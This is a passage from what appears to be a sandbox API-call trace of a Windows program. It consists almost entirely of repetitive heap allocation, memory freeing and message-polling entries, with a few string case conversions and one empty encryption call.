wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.433] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.433] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.434] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0267.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.434] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0267.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.435] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.435] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.436] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.436] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.436] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.436] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.436] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.436] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.436] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.437] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.437] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.437] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.437] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.437] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.438] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.438] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.438] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.438] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.438] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.439] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.439] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.439] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.439] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.440] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.440] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0267.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, 